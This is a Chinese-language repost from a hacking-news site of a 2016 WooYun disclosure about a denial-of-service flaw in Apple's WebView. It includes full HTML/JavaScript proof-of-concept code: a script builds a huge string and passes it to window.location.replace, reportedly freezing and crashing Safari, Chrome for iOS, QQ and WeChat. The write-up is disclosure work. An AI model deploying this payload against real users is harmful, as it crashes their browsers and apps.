记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Apple MAC/IOS Webview拒绝服务漏洞(影响safari,chrome for IOS,QQ,微信等)

2016-01-17 13:10

apple webview 没正确处理循环中的replace,可使用了webview的应用崩溃



code 区域
<html>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<head>

<h1>Mac/IOS Webview DOS test by 数据流</h1><br>

<script>

function x(str,count){

if(count==0) return '';

var b = count.toString(2);

var n = b.length;

var s='';

for(var i=0; i<n; i++){

s+=s;

if(b.charAt(i) == '1'){

s+=str;

}

}

return s;

}





function test()

{

var ree = x("a",333333333);

window.location.replace("http://" + ree);

}

//test();

</script>

</head>

<body>

<a href="#" onclick=test()>Click_Me</a>

</body>

</html>



漏洞证明:

影响MAC上的safari和IOS上的所用使用webview的应用



IOS 6,7,8,9 均成功测试



以Chrome for IOS为例.. 另外QQ 微信等均可拒绝服务



当js代码运行时,实际应用已经假死,无法点击操作..当数秒后便会闪退.



MAC:

在MAC上的safari也会造成拒绝服务,假死,无响应,cpu使用率逐渐飙升.



1.png



2.png



i.jpg





修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0146717

阅读:69948 | 评论:0 | 标签:漏洞 iOS

想收藏或者和大家分享这篇好文章→复制链接地址

“Apple MAC/IOS Webview拒绝服务漏洞(影响safari,chrome for IOS,QQ,微信等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云